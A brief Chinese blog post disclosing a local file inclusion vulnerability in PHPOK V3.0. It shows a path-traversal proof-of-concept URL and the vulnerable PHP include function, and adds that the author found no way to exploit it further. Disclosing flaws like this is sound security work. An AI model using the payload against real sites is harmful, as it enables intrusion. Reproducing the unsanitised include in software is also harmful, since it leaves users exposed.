PHPOK V3.0 企业站程序本地文件包含漏洞 2011-01-02 老系统内容 PHP 本地 程序 漏洞 企业 文件 文件包含 约 53 字 预计阅读 1 分钟 文章目录 http://127.0.0.1/index.php?c=js&f=index&act=/../123 看代码: app\www\control\js.php function index_f() { $act = $this->trans_lib->safe("act"); if(file_exists(ROOT_JS.$act.".php")) { include(ROOT_JS.$act.".php"); } else { echo "ERROR"; } exit(); } 刚看了一下后台,没发现可利用地方,虽然已经达成加载全局函数条件。 文章作者 Nuclear'Atk 上次更新 2011-01-02 许可协议 Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。